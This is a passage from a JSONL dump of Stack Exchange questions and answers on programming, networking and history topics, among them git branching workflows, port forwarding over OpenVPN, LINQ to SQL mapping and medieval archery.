this?\nComment: need more context to this question. Obviously you've looked into system.Drawing.Color and you haven't found what you want there. What are you looking for.\nComment: I think you should provide an example of the java code you need to port, this would help determine the best approach.\nAnswer: I'm not entirely familiar with the Java namespace, but maybe you're looking for System.Drawing.Color?\nEDIT: \nObviously Java and ICC are not my game, but I figured I'd still try to help out. 
There are several references to ICC in the documentation for System.Windows.Media.\nColor Structure:\nhttp:\/\/msdn.microsoft.com\/en-us\/library\/system.windows.media.color.aspx\nColor Context:\nhttp:\/\/msdn.microsoft.com\/en-us\/library\/system.windows.media.colorcontext.aspx\nMaybe this is a sufficient starting point to find the functionality you are seeking.\nComment: To quote the package summary: \"Provides classes for color spaces. It contains an implementation of a color space based on the International Color Consortium (ICC) Profile Format Specification, Version 3.4, August 15, 1997. It also contains color profiles based on the ICC Profile Format Specification.\"\nComment: ColorContext represents the ICC or ICM profile, see also pixel formats http:\/\/msdn.microsoft.com\/en-us\/library\/system.windows.media.pixelformats.aspx\nAnswer: The java.awt.color namespace seems to only concern itself with color spaces. There's no such concept in .Net as a color space. Everything in .Net is based on RGB (RGB color space) except perhaps some new XAML attributes in WPF. The java.awt.color namespace includes considerations for such ideas as CMYK (Cyan, Magenta, Yellow bLack) which is used in printing applications only.\nMy guess is that unless you are indeed working on an application that sends CMYK color data to a printer then you don't need to worry about it. The colors in .Net are based around RGB or aRGB (even the gray scale. The RGB values are simply all equal so RGB(128,128,128=MediumGray)\nAnswer: The SystemColors class provides access to system brushes and colors, such as ControlBrush, ControlBrushKey, and DesktopBrush. A system brush is a SolidColorBrush object that paints an area with the specified system color. A system brush always produces a solid fill; it can't be used to create a gradient.\nThe System.Drawing namespace has brushes, images, converters, system colours, regions and pretty much all the basics for drawing on windows. I think this works closely with GDI+.\nIf you have any specif classes you need to map to or requirements add a comment and I'll see what I can do.\n","meta":{"source":"stackoverflow","title":".NET equivalent of java.awt.color.ColorSpace","dup_signals":{}},"subset":"stackexchange"} +{"text":"Strange behaviour using OpenLayers + Mapguide Layer\n\nQuestion: I'm trying to use a Mapguide Layer with OpenLayers.\nFirst of all, I've used code taken from the official example page.\nAll works fine, the map is showed and I can zoom it.\nBut, if I move the map (pan), the map recenter automatically on the initial center.\nI've used exactly the same code as the example page mentioned above. \nIt's something missed with my mapguide?\nAnswer: I've found the problem.\nBy default, OpenLayers doesn't had support to EPSG:3003.\nDespite this, when I do { projection: new OpenLayers.Projection(\"EPSG:3003\") } in the code, no errors raise. \nI've fixed this adding proj4js library and definition for EPSG:3003.\nHope this help someone else :)\nAnswer: This URL below is working (openlayer + mapguide).\nhttp:\/\/openlayers.org\/en\/v3.9.0\/examples\/mapguide-untiled.html?q=mapguide\n","meta":{"source":"stackoverflow","title":"Strange behaviour using OpenLayers + Mapguide Layer","dup_signals":{}},"subset":"stackexchange"} +{"text":"Reset HTML List Depth To Root Level (for bullets)\n\nQuestion: As an example, I would like to set level 4 of the list in this fiddle (code below) to the root level. 
This would mean the bullets for level 4 would look like level 1, level 5 would look like level 2 and level 6 would look like level 3. This would need to happen without manually overriding the bullets per item because different browsers have different bullet styles.\n<code><ul>\n <li>level 1 item<\/li>\n <li>level 1 item\n <ul>\n <li>level 2 item<\/li>\n <li>level 2 item\n <ul>\n <li>level 3 item<\/li>\n <li>level 3 item\n <ul>\n <li>level 4 item<\/li>\n <li>level 4 item\n <ul>\n <li>level 5 item<\/li>\n <li>level 5 item\n <ul>\n <li>level 6 item<\/li>\n <li>level 6 item<\/li>\n <li>level 6 item<\/li>\n <\/ul>\n <\/li>\n <li>level 5 item<\/li>\n <\/ul>\n <\/li>\n <li>level 4 item<\/li>\n <\/ul>\n <\/li>\n <li>level 3 item<\/li>\n <\/ul>\n <\/li>\n <li>level 2 item<\/li>\n <\/ul>\n <\/li>\n <li>level 1 item<\/li>\n<\/ul>\n<\/code>\nComment: There is no way (AFAIK) to \"re-start\" the multi-level styling. You can set the 4th level to `list-style:initial` but this will affect all nested `ul` as well - https:\/\/jsfiddle.net\/83tbzu2j\/2\/ Of course, if you can figure out a way to **not** affect the deeper levels you may have something....but I don't think so. You might be better off with CSS Counters.\nComment: @Paulie_D `list-style: initial` doesn't appear to do anything in Chrome in relation to bullet styles.\nComment: Did in my version. It switches from a square bullet to a round one.\nComment: We need a `:nth-nested-child` selector. That would be awesome! :) But I think Paulie_D is right. There is no CSS way to do this. If you want, I give you a jQuery solution.\nComment: @Paulie_D I see, was on a machine earlier with lower resolution and thought they were the same.\nComment: @Huelfe I'm trying really hard to avoid any JS in this.\nAnswer: It seems all browsers go disc-circle-square so I managed to get this with a bit of <code>CSS<\/code> and a class (applies automatically to <code><ul><\/code> elements inside an <code><ol><\/code> element but not otherwise.) Fiddle here and <code>CSS<\/code> below:\n<code>ol > li > ul > li > ul > li > ul {\n list-style-type: square;\n}\nul.initial > li > ul > li > ul {\n list-style-type: square;\n}\nol > li > ul > li > ul {\n list-style-type: circle;\n}\nul.initial > li > ul {\n list-style-type: circle;\n}\nol > li > ul {\n list-style: initial;\n}\nul.initial {\n list-style: initial;\n}\n<\/code>\n","meta":{"source":"stackoverflow","title":"Reset HTML List Depth To Root Level (for bullets)","dup_signals":{}},"subset":"stackexchange"} +{"text":"Allowing access to my server's UDP ports when the server is connected to OpenVPN\n\nQuestion: I've recently bought some cheap vps, and would like to open some ports, I already done that on server with ufw. btw I'm connecting to a VPN that allows me to forward ports to my local machine via OpenVPN since my local provder is blocking ports.\nOpenVPN works fine on my pc all connected and working but it shows me only TCP ports are open,all UDP ports closed when i connected on VPN, but when I check on some webiste port checker and paste IP of server it tells its open..\nI guess it has somehing with iptables or something like that..? Could anyone help me? THANKS\nEDIT. 
I made this work by doing these commands:\n<code>iptables -t nat -A PREROUTING -d SERVERIP -p UDP --dport 1234-j DNAT --to-dest 10.8.0.6:1234\n\niptables -t filter -A INPUT -p udp -d 10.8.0.6 --dport 3480 -j ACCEPT\n<\/code>\nand 10.8.0.6 is IP of OPENVPN \nComment: Sorry, this is a bit confused, how did you check that UDP port is closed (this is technically not possible like you can do with TCP port with telnet by example). In fact, what do you want to open?\nComment: First of all thanks for answering. i want to host games in ps4 so my plan was to order server setup vpn and have open ports simple as that.. but when i setup everything i saw on ps4 that nat is still not open.. Then i check on my pc with this tool and saw this:\nTCP: https:\/\/img.techpowerup.org\/190403\/capture094-20190404.jpg\nand UDP: https:\/\/img.techpowerup.org\/190403\/capture095-20190404.jpg\nComment: I think, instead of **EDIT. I made this...**, you should answer your question using what you've answered in **EDIT** and accept it after two days will expire.\nAnswer: If I understood what you are trying to achieve, you are try to do NAT from a VPS and forward TCP and UDP port to a local network reachable through a VPN tunnel (OpenVPN). This is probably not working due a routeback issue, your local network is probably configured to reach internet without using OpenVPN connection, so traffic coming from your NAT will not answering to your VPS.\nWhat you can try is proxying your traffic over a service (like nginx). Here an example.\nInstall Nginx (on your VPS):\n<code>apt install nginx\n<\/code>\nCreate a new folder dedicated for your port rules\n<code>mkdir \/etc\/nginx\/ports\/\n<\/code>\nAdd the following lines to the end of the file <code>\/etc\/nginx\/nginx.conf<\/code>\n<code>stream {\n include \/etc\/nginx\/ports\/*;\n}\n<\/code>\nFinally create any file you want with your rules, into this new folder. Here an example of tcp and udp redirect.\n<code>\nserver {\n listen 1234;\n proxy_pass <computer-ip>:1234;\n}\n\nserver {\n listen 1234 udp;\n proxy_pass <computer-ip>:1234;\n}\n\nOf course, port 1234 must be opened in your ufw as your mentioned.\n<\/code>\nComment: Im gonna try this right now and i will update results\nComment: I still didnt get it working, have i done something wrong??\nUFW: https:\/\/img.techpowerup.org\/190403\/capture096-20190404.jpg\n\nhttps:\/\/img.techpowerup.org\/190403\/capture097-20190404.jpg\nComment: ProxyPass should be the local IP, not the public one.\n","meta":{"source":"askubuntu","title":"Allowing access to my server's UDP ports when the server is connected to OpenVPN","dup_signals":{}},"subset":"stackexchange"} +{"text":"Git branch strategy for small dev team\n\nQuestion: We have a web app that we update and release almost daily. We use git as our VCS, and our current branching strategy is very simple and broken: we have a master branch and we check changes that we 'feel good about' into it. This works, but only until we check in a breaking change.\nDoes anyone have a favorite git branch strategy for small teams which meets the following requirements:\n\nWorks well for teams of 2 to 3 developers\nLightweight, and not too much process\nAllows devs to isolate work on bug fixes and larger features with ease\nAllows us to keep a stable branch (for those 'oh crap' moments when we have to get our production servers working)\n\nIdeally, I'd love to see your step-by-step process for a dev working on a new bug\nAnswer: You might benefit from the workflow Scott Chacon describes in Pro Git. 
In this workflow, you have two branches that always exist, master and develop.\nmaster represents the most stable version of your project and you only ever deploy to production from this branch.\ndevelop contains changes that are in progress and may not necessarily be ready for production.\nFrom the develop branch, you create topic branches to work on individual features and fixes. Once your feature\/fix is ready to go, you merge it into develop, at which point you can test how it interacts with other topic branches that your coworkers have merged in. Once develop is in a stable state, merge it into master. It should always be safe to deploy to production from master.\nScott describes these long-running branches as \"silos\" of code, where code in a less stable branch will eventually \"graduate\" to one considered more stable after testing and general approval by your team.\nStep by step, your workflow under this model might look like this:\n\nYou need to fix a bug.\nCreate a branch called myfix that is based on the develop branch.\nWork on the bug in this topic branch until it is fixed.\nMerge myfix into develop. Run tests.\nYou discover your fix conflicts with another topic branch hisfix that your coworker merged into develop while you were working on your fix.\nMake more changes in the myfix branch to deal with these conflicts.\nMerge myfix into develop and run tests again.\nEverything works fine. Merge develop into master.\nDeploy to production from master any time, because you know it's stable.\n\nFor more details on this workflow, check out the Branching Workflows chapter in Pro Git.\nComment: I think this is great, except if you create bug fix branches from the develop branch, you are forcing you can't merge it into master and deploy it without also merging in everything else \"new\" that you've not released yet, which might be a real pain if there is something in that branch that needs documenting \/ database changes or something else hard to do. I think for urgent \"hotfixes\", you should make your branch from master.\nComment: Also Scott Chacon has an excellent article on his site on how Github's workflow with Git works - http:\/\/scottchacon.com\/2011\/08\/31\/github-flow.html\nComment: At step 8, merging the develop branch into master sounds like a bad idea given that some of the code in develop might not be ready to go into production. Wouldn't we be better off merging the feature branch into master?\nComment: What if we are developing 2 separate features, F1 and F2, where F1 is to be released in a week but F2 is to be released in 2 weeks, assuming that the development of F1 and F2 coincide? Any suggestions on that?\nComment: The `develop` is an unecessary 'solution' to a problem that git doesn't have. As far as I can tell the success is due to a well written if misguided article with no comments allowed. Here's a counter-article https:\/\/barro.github.io\/2016\/02\/a-succesful-git-branching-model-considered-harmful\/\nComment: I can backup Stony's comment with practical experience that this happens more often than you'd hope. Even features can run into this problem if you start work after someone else's has begun merging for QA. You can take the branch at the previous release cut, but in practice not all developers remember.\nComment: @program247365 that link is awesome (it should be it's own answer). 
It's really simple, and if it's good enough for GitHub's 35 employees, it's good enough for me :)\nComment: Create a branch F1 out of develop, create another branch F2 out of develop branch. Both developers can work on their respective branch with the F2 developer frequently pulling updates from F1.\nComment: @DustinBoswell Ok, made it, it's own answer: http:\/\/stackoverflow.com\/a\/11994209\/5716\nComment: This doesn't work if you need to maintain multiple versions of a product.\nComment: @program247365 From the blog (2011): _\"That is the entire flow. It is very simple, very effective and works for fairly large teams - GitHub is **35** employees now, maybe 15-20 of whom work on the same project (github.com) \"_ - Currently, Wikipedia lists GitHub as having 745!!!\nAnswer: After coming in as a novice trying to find a straight-forward strategy to teach to other devs who have never used source control. This is the one that fit http:\/\/nvie.com\/posts\/a-successful-git-branching-model\/ I tried using the standard GIT workflow thats in the man pages but it confused me slightly and my audience completely. \nOver the past 6 months I have only had to fix conflicts twice.\nI have added steps to always test after a merge and to 'fetch and merge\" or 'pull --rebase\" a lot (once in the morning and in the afternoon) while developing features. We also used github.com as the central place to pull the latest code.\nComment: I die a little inside everytime I see someone pick up that blog post. Here's a rebuttal: https:\/\/barro.github.io\/2016\/02\/a-succesful-git-branching-model-considered-harmful\/\nComment: That is an excellent link! That workflow works superbly well for our small team who always work remotely and parallelly on multiple release versions at a time. Very well documented. Thanks Clutch!\nComment: Ah, so this is where I found that link :-) I looked at several Git strategies before setting up my first Git project (I have moved from SCCS to CVS to SVN over the years and now I wanted to try Git for a new project) and this was the one that made the most sense to me. I recognize your post so I'm pretty sure this is where I found it. So Thanks - it works wonderfully well!\nComment: I share the same feeling with you @TimAbell; I strongly feel it not right when the `default master branch` is NOT used the most often be developer in this `A successful Git branching model`\nComment: Your having to fix conflicts twice might be circumvented by using [git rerere](https:\/\/git-scm.com\/docs\/git-rerere). 
Some background can be found in [Fix conflicts only once with git rerere](https:\/\/medium.com\/@porteneuve\/fix-conflicts-only-once-with-git-rerere-7d116b2cec67).\nAnswer: (Made my comment above it's own answer, as I should have initially.)\nFrom Scott Chacon of Github:\n\nHow We Do It So, what is GitHub Flow?\n\nAnything in the master branch is deployable \nTo work on something new, create a descriptively named branch off of master (ie:\n new-oauth2-scopes) \nCommit to that branch locally and regularly push your work to the same named branch on the server \nWhen you need feedback or help, or you think the branch is ready for merging, open a\n pull request \nAfter someone else has reviewed and signed off on the\n feature, you can merge it into master\nOnce it is merged and pushed to 'master', you can and should deploy immediately\n\nSee the entire article for more details: http:\/\/scottchacon.com\/2011\/08\/31\/github-flow.html\nNote that \"pull requests\" are a Github invention, and it's something that's baked into their website, not Git itself: https:\/\/help.github.com\/articles\/using-pull-requests\/\nComment: With a smaller team and devs less experienced with git, this workflow's simplicity wins out. The only thing we do differently is having a 'staging' branch between the feature branch and master that acts as a live QA site for non devs to okay the feature in a production like environment.\nComment: @Squadrons sounds like you need [octopus deploy](https:\/\/octopus.com\/) for that, that has gates built in to ok\/deny builds getting onto different environments and doesn't pollute your source control with such things.\nComment: Creating feature branches off of master and then merging them back in for deployment is OK, so long as you have a tag so there's a safe rollback point. Deployments don't always go according to plan. Whether you believe in \"roll forward only\" doesn't matter much when you're haemorrhaging money.\nAnswer: Use the <code>master<\/code> branch as your development branch and create release branches for performing bug fixes.\nAny new features will go on <code>master<\/code> during the development window (either committed directly or as topic branches with pull-requests, up to you -- not shown in graphic). Once all your planned features are implemented, enter feature freeze, and perform testing. When you're happy, tag the release on <code>master<\/code> as <code>v1.0<\/code>.\nOver time your users will find bugs in <code>v1.0<\/code> so you'll want to create a branch from that tag (e.g. name it after the release <code>1.0<\/code>) and fix those bugs in the branch. When you've got enough bugs fixed that you think it warrants a new release then tag it as <code>v1.0.1<\/code> and merge it back into <code>master<\/code>.\nMeanwhile a new development window can be happening on the <code>master<\/code> branch which will eventually be tagged as <code>v1.1<\/code>.\nRinse & repeat.\nThis follows Semantic Versioning numbering logic.\n<code> ---------(v1.0)--------------------------------(v1.1)-----------------------------> master\n \\ \\ \n ---(v1.0.1)---(v1.0.2)---> 1.0 ---(v1.1.1)---(v1.1.2)---> 1.1\n<\/code>\nComment: Don't forget to merge your `1.0.1` changes back into `master`\nComment: cherry-pick is a better option for retrieving release changes into master\nComment: And always keep in mind to rebase `1.1` on master after merging `1.0.1` - this helps minimize confiction.\nComment: No. Don't merge release branches back into master! 
It can give you all sorts of headaches that you do not need (merging in release-only stuff, merge conflicts with newer releases, breaking builds, non-linear history, etc. Believe me, I've seen it happen more than once). Instead, treat releases as forks. See http:\/\/www.bitsnbites.eu\/a-stable-mainline-branching-model-for-git\/\nComment: @NamGVU I wouldn't recommend that. `1.1` is a release branch and has tags representing the exact state of one or more releases. Rebasing that branch would cause you to lose that representation. I'd strongly recommend setting your release branches to deny force pushes to prevent this.\nAnswer: In a VCS, having just a \"master\" branch shows quickly its limits because you cannot pursue all the development effort at the same time on one branch.\nThat means you need to know when to branch.\nBut in a DVCS (as in \"Decentralized\" VCS), you also have a publication issue, with branches you keep local to your repositories, and branches you are pushing to or pulling from.\nIn this context, start by identifying your concurrent development effort, and decide on a publication (push\/pull) process. For instance (and this is not the only way):\n\nprod is a read-only public branch with the code in production. Everyone could pull from it in order to:\n\nrebase its current development on top of it (for local testing, or for integrating on the local dev repo a hotfix done in the prod repo on the prod branch)\nbranch to do new features (from a known stable code)\nbranch to start the next release branch (the one which is to be in production)\nno one should push directly to prod (hence the read-only)\n\nrelease is a read-write consolidation branch, where the relevant commits are cherry-picked to be part of the next release.\nEveryone can push to release to update the next release.\nEveryone can pull from said release in order to update his\/her local consolidation process.\nfeatureX is a private read-write branch (in that it does not need to be push to the central prod repo), and can be pushed\/pulled between dev repos. It represents middle to long term effort, different from the daily dev\nmaster represents the current dev, and is pushed\/pulled between the dev repos.\n\nOther release management processes exist, as this SO question attests.\nAnswer: Read through ReinH's Git Workflow for Agile teams here: http:\/\/reinh.com\/blog\/2009\/03\/02\/a-git-workflow-for-agile-teams.html\nThis works very well for small teams. The goal here is to make sure everything that might be potentially unstable goes in to a branch of some kind. Only merge back to master when you are ready for everyone working outside of the feature branch to use it.\nNote: this strategy is hardly git specific, but git makes implementing this strategy pretty easy.\n","meta":{"source":"stackoverflow","title":"Git branch strategy for small dev team","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to fetch the last changeset infomation from a remote mercurial repository without pulling?\n\nQuestion: Working on the same project from different machines using bitbucket\/github as a central repo, many times I want to check out the most recent changeset in the remote central repo before doing anything from a local machine, is there a way to do that, I would imagine something similar to <code>hg tip<\/code> but reporting the remote repo instead of the local one. 
Thanks.\nEDIT:\nI only need the description of the last changeset, rather than the content, just to remind myself what stuffs I committed last time.\nAnswer: <code>hg incoming<\/code> will show you what will come if you pull. If you just want the latest change\n<code>hg incoming -n -l1\n<\/code>\nhowever seeing all of them would be preferable for any use I can think of\nyou comment about seeing what you committed last time confuses me however as this commit will be in your local repo already presumably (unless you are talking about using different local repos at different revisions?)\nComment: thanks, that does the trick. Yep, I am using different local repos at different revisions, and you are right, simply doing \"hg incoming\" would be more preferable, I assumed there is only one changeset difference between the local and remote repos when I was asking the question.\nAnswer: Mercurial only clones full repositories, but most hosting sites, including github and bitbucket, make available links to download a tarball of any given revision, including 'tip'.\nComment: I don't need the full repo nor the full package, but only the description of the last commit.\nComment: Ah, I totally didn't get that from your pre-edit question. Glad someone else did.\n","meta":{"source":"stackoverflow","title":"How to fetch the last changeset infomation from a remote mercurial repository without pulling?","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to add field not mapped to table in Linq to Sql\n\nQuestion: In Entity Framework I can apply <code>NotMapped<\/code> attribute to a property which I do NOT want to create a column in a database table for. How to get the same effect for auto generated classes in DBML file?\nI have a <code>StoredProcedure<\/code> that returns some additional fields.\nI called <code>SP<\/code> like:\n<code>[global::System.Data.Linq.Mapping.FunctionAttribute(Name = \"dbo.sp_GetSupplierArticles\")]\npublic ISingleResult<SupplierArticle> GetSupplierArticles([global::System.Data.Linq.Mapping.ParameterAttribute(DbType = \"BigInt\")] long mainArticleId, [global::System.Data.Linq.Mapping.ParameterAttribute(DbType = \"BigInt\")] long? userId)\n{\n IExecuteResult result = this.ExecuteMethodCall(this, ((MethodInfo)(MethodInfo.GetCurrentMethod())), mainArticleId, userId);\n return ((ISingleResult<SupplierArticle>)(result.ReturnValue));\n}\n<\/code>\nNecessary field I added into the separated partial class. Without any additional attributes it returns default value for my and applied <code>[Column(IsDbGenerated = false)]<\/code> in the separated partial class:\n<code>public partial class SupplierArticle\n{\n [Column(IsDbGenerated = false)]\n public double Extra { get; set; }\n}\n<\/code>\nSo it works until I try to get <code>SupplierArticle<\/code> using another query (not my stored procedure):\n<code>db.LoadOptions = db.GenerateDataLoadOptions(entitiesToInclude);\nvar query =\n from shoppingCartItem in db.ShoppingCartItems\n where shoppingCartItem.UserId == userId\n select shoppingCartItem;\nreturn query.ToList();\n<\/code>\nMy entity is loaded due to <code>LoadOptions<\/code> (passed in <code>entitiesToInclude<\/code> parameter).\nIn this query and another which try to load \"poor\" entity with properties that defined in .dbml file I get exception:\nInvalid column name 'Extra' and the same message for each additional property.\nWhat is the proper way to extend entity or how to avoid that exception?\nUPD:\nIf I remove all attributes exception no longer occurs. 
But added properties are not initialized when <code>SP<\/code> returns a result.\nComment: @Gert, suggested answer is not acceptable for me. I tried that way but does not work.\nComment: @GertArnold, please approve my question. Thanks\nComment: If I understand correctly, cant you create a new `model` with the required fields?\nComment: Also, if you are trying to extend a EF generated class; it should be in the same namespace.\nComment: @TheUknown, I can create and I did it in the same namespace in partial class, so I just extended auto generated class. But properties without `Column` attribute are not mapped and always contain default value of their type even Stored Procedure returns columns with the same name. After adding `Column` attribute it works fine with `SP` but not with a normal LINQ query which also try to get values that are not exist in the table.\nComment: What if you just create a subclass from SupplierArticle and add Extra field to it. The instance you get from linq you can pass to this SupplierArticleSubclass and initialize additional fields\nAnswer: I would suggest creating a complex type for that stored procedure. I would even go as far as creating complex types for all of your stored procedures as this is best practice. You can then add an extension method, or a method to your partial classes that will convert the complex type returned from the stored procedure to it's related entity, and vice versa. Another option would be to include a foreign key to your complex stored procedure type, and a navigation property pointing to the correct entity. \nThese are, of course, solutions to a problem that EF itself doesn't address. This is expected as EF is an ORM and is not concerned with what's not persisted.\nAnswer: A SQL View could be used if you wanted to. The View is composible and LINQ to SQL does not distinguish it from a Table. First rename the original table. Then make a View with the same name as the original table, while including the extra column with a default value. Let the Stored Procedure use the table with the new name. Of course any other SQL objects with references to the table need to be updated with the new table name. Now both LINQ to SQL and the SP will be happy.\n","meta":{"source":"stackoverflow","title":"How to add field not mapped to table in Linq to Sql","dup_signals":{}},"subset":"stackexchange"} +{"text":"Computing half vector on WebGL\n\nQuestion: http:\/\/www.lighthouse3d.com\/opengl\/glsl\/index.php?ogldir2 shows the following:\n\nH = Eye - L\n\nI did the following on my WebGL vertex shader to compute the half-vector:\n<code>vec4 ecPosition = u_mvMatrix * vec4(a_position.xyz, 1.0); \/\/ Get the eye coordinate position\nvec3 eyeDirection = normalize(-ecPosition.xyz); \/\/ Get the eye direction\nv_halfVector = normalize(eyeDirection + lightDirection); \/\/ Compute and normalize the half-vector\n<\/code>\nBut I am not sure if the above code snippets are correct.\nAny pointer\/help is appreciated. 
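\nTo double-check the underlying math on the CPU side, here is a small numpy sketch of what I believe the shader should compute (the positions are made-up illustrative values, everything in eye coordinates):\n<code>import numpy as np\n\ndef normalize(v):\n    return v \/ np.linalg.norm(v)\n\np_eye = np.array([0.5, 0.0, -2.0])  # surface position in eye coordinates (illustrative)\nl_eye = np.array([1.0, 1.0, 0.0])   # light position in eye coordinates (illustrative)\n\nV = normalize(-p_eye)         # from the surface point towards the eye (origin in eye space)\nL = normalize(l_eye - p_eye)  # from the surface point towards the light\nH = normalize(L + V)          # Blinn half-vector\nprint(H)\n<\/code>\n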
Thanks in advance for your help.\nEDIT: It seems the correct code should be\n<code>vec4 ecPosition = u_mvMatrix * vec4(a_position.xyz, 1.0); \/\/ Position in the eye coordinate position\nvec3 ecLightPosition = (u_mvMatrix * lightPosition).xyz; \/\/ Light position in the eye coordinate\nvec3 lightDirection = ecLightPosition - ecPosition.xyz \/\/ Light direction\nvec3 eyeDirection = (-ecPosition.xyz); \/\/ Eye direction\nv_halfVector = normalize(eyeDirection + lightDirection); \/\/ Compute and normalize the half-vector\n<\/code>\nAnswer: Assuming you're trying to get the average of the eye and light vectors, shouldn't that last line be \"normalize(eyeDirection + lightDirection)\" instead? Also, it might make more sense to invert the light vector instead of the eye since it's coming out of the surface.\nI'm not an expert here, so take my advice with a huge grain of salt. :)\n","meta":{"source":"stackoverflow","title":"Computing half vector on WebGL","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to remove the space between two fragments in android view pager?\n\nQuestion: How can i remove the space between two fragment view in view pager. I tried the following code, it's working in higher end devices, when i goes to lower end both fragement are merged.\n<code>private void screenDensityCheck(ViewPager pager)\n {\n\n float density = FragmentMainActivityHolder.this.getResources()\n .getDisplayMetrics().density;\n if (density >= 4.0)\n {\n pager.setPageMargin(-8 );\n Log.e(\"Mobile screen category===>>>>>>>>>\", \"xxxhdpi screen\");\n } else if (density >= 3.0)\n {\n pager.setPageMargin(-21);\n Log.e(\"Mobile screen category===>>>>>>>>>\", \"xxhdpi screen\");\n } else if (density >= 2.0)\n {\n pager.setPageMargin(-16);\n Log.e(\"Mobile screen category===>>>>>>>>>\", \"xhdpi screen\");\n } else if (density >= 1.5)\n {\n pager.setPageMargin(-26);\n Log.e(\"Mobile screen category===>>>>>>>>>\", \"hdpi screen\");\n } else if (density >= 1.0)\n {\n pager.setPageMargin(-26);\n Log.e(\"Mobile screen category===>>>>>>>>>\", \"mdpi\");\n } else\n {\n pager.setPageMargin(-35);\n Log.e(\"Mobile screen category===>>>>>>>>>\", \"ldpi\");\n }\n }\n<\/code>\nComment: final int pageMargin = (int) TypedValue.applyDimension(\n TypedValue.COMPLEX_UNIT_DIP, 4, getResources()\n .getDisplayMetrics()); is this code helpful to you ??\nComment: @andruboy: shall i use this for all type screen resolution?\nComment: did you try this ?? just try it :)\nComment: @andruboy: sorry there is some space b\/w the fragment one and two\nComment: @andruboy: dude, i set 8 instead of 4, it seems looking great, this change will cause any serious problem?\nComment: No but if it is helping you than do it :) should i post as answer ??\nComment: See i have posted as answer\nAnswer: hey this code helps you :) \n<code>final int pageMargin = (int) TypedValue.applyDimension( TypedValue.COMPLEX_UNIT_DIP, 8, getResources() .getDisplayMetrics());\nviewPager.setPageMargin(pageMargin);\n<\/code>\n","meta":{"source":"stackoverflow","title":"How to remove the space between two fragments in android view pager?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Did English archers use thumb rings?\n\nQuestion: Essex Dogs by Dan Jones describes in passing English or Welsh archers 1 using thumb rings during the hundred year's war.\nI can find (unreliable) references to Roman thumb rings, and certainly the Romans encountered Asiatic archers, so it is not implausible. 
And Western European archers would have encountered Huns (plus the crusades). It is quite plausible.\nBut I've found no record of Asiatic\/thumb draw in any of my sources on English Archery. I'm reluctant to conclude that absence of evidence is evidence of absence.\nIs there a fundamental reason why Western\/English archers preferred the Mediterranean draw?\n\n1 I listened to it in an audio book which makes it very difficult to go back and check. I think the reference is to the English archer, but even the Welsh archers are fighting (most of the time) in support of the English army. It is also possible that I misunderstood a reference to an ornamental ring as a reference to an archer's thumb ring.\nComment: Another 'lack of evidence' entry would be the lack of any thumb rings on the [Mary Rose](https:\/\/maryrose.org\/meet-the-soldiers\/#archery). If thumb rings were in use you would expect to find them amongst the 137 intact bows and 3500 arrows found on this wreck.\nComment: Excellent point!!\nAnswer: \nIs there a fundamental reason why Western\/English archers preferred the Mediterranean draw?\n\nI don't know or can't find reliable sources, but as an archer for decades, I can see a good and practical reason why they wouldn't prefer the Mongolian draw (or the Asian thumb draw) because it is far less easy to learn, and mostly intended for use by mounted archers (for that, it has a different draw length1, and the arrow is placed differently):\n\nHaving the ability to better hold the arrow in place is ideal for mounted archers who have to contend with the vibrations and movements of their mounts. Archery Thumb Rings: Eastern Draw\n\nAs early western armies mainly used peasants\/poor as archers, bowmen fought on foot. They needed little training as they already were using bows to hunt, and often were required to be trained on archery (with a Mediterranean draw they knew\/were taught with). Of course, armies fought foreigners, and probably learnt their opponent's methods\/strategies, as well as travelers who brought back hunting\/fighting technique, but it must have been marginal amongst archers.\n1. Archers using the Mongolian draw are placing their draw hand near their front shoulder, cheek, ear, or past their face. It usually extends the draw.\nComment: mounted archers probably initiated and developped in middle-east\/Asia before spreading in other parts of the world, but european archers were footed.\nComment: I'm not sure that much of the last paragraph actually applies to the English\/Welsh archers of the Hundred Years War period. While they fought the major battles on foot, there were mounted archers used in the chevauch\u00e9es against the French. Effective use of the longbow required regular practice and it wasn't easy to just pick up and use one (which is why inferior firearms replaced the bows - the firearms were easier to master). In this period, hunting was the domain of the uppermost classes. The land, and the animals in it, was the property of the king. Poaching could get you hanged.\nComment: English longbowmen typically weren't mounted.\nComment: I'd be quite surprised if the mounted archers in chevauch\u00e9es used longbows while mounted. I could envision them dismounting to shoot, or shooting a smaller hunting bow. (My understanding is that nobles hunted with shorter handbows commonly, but the bow and the technique were distinct from longbow). Both the length of the longbow, and the posture used for the longbow would make mounted archery quite difficult. 
I'd be very happy to learn differently.\n","meta":{"source":"history.stackexchange","title":"Did English archers use thumb rings?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Regex for 8-digit expression without hyphen or letters\n\nQuestion: Currently, I have this:\n<code>Regex folderRegex = new Regex(@\"^.{8})([0-9]+)?[1-9]+([0-9]+)?$\");\n<\/code>\nI need the string to have exactly 8 digits. Without hyphens or letters. Would my regex do that?\nAnswer: I think you need a very simple pattern.\n<code>^\\d{8}$\n<\/code>\nShort description\n\nAssert position at the beginning of the string <code>^<\/code>\nMatch a single digit 0..9 <code>\\d<\/code>\n\nExactly 8 times <code>{8}<\/code>\n\nAssert position at the end of the string (or before the line break at the end of the string, if any) <code>$<\/code>\nAnswer: You can also do the same thing using a character class with a grouping range. \n<code>Regex folderRegex = new Regex(@\"^[0-9]{8}$\");\n<\/code>\nRegular expression:\n<code>[0-9]{8} any character of: '0' to '9' (8 times)\n<\/code>\nAnswer: Assuming from what is given in your question that you do not want your string of eight digits to start with a <code>0<\/code>, this should do:\n<code>^[1-9]\\d{7}$\n<\/code>\n","meta":{"source":"stackoverflow","title":"Regex for 8-digit expression without hyphen or letters","dup_signals":{}},"subset":"stackexchange"} +{"text":"Excel ScreenUpdating false and still flickering on Copy Paste to another worksheet\n\nQuestion: I am beginner and still learn about programming on macro VBA excel. I need help from community to solve my problem on macro code on excel\n<code>Sub export_data()\n\nWith Application\n .ScreenUpdating = False\n .Calculation = xlManual 'sometimes excel calculates values before saving files\nEnd With\n\nDim wsCopy As Worksheet\nDim wsDest As Worksheet\nDim wsDest2 As Worksheet\nDim lCopyLastRow As Long\nDim lDestLastRow As Long\nDim lDestLastRow2 As Long\nDim i As Long\nDim check As Long\n\n 'Set variables for copy and destination sheets\n Set wsCopy = Workbooks(\"Book 1.xlsm\").Worksheets(\"Sheet 1\")\n Set wsDest = Workbooks(\"Book 2.xls\").Worksheets(\"Sheet 1\")\n Set wsDest2 = Workbooks(\"Book 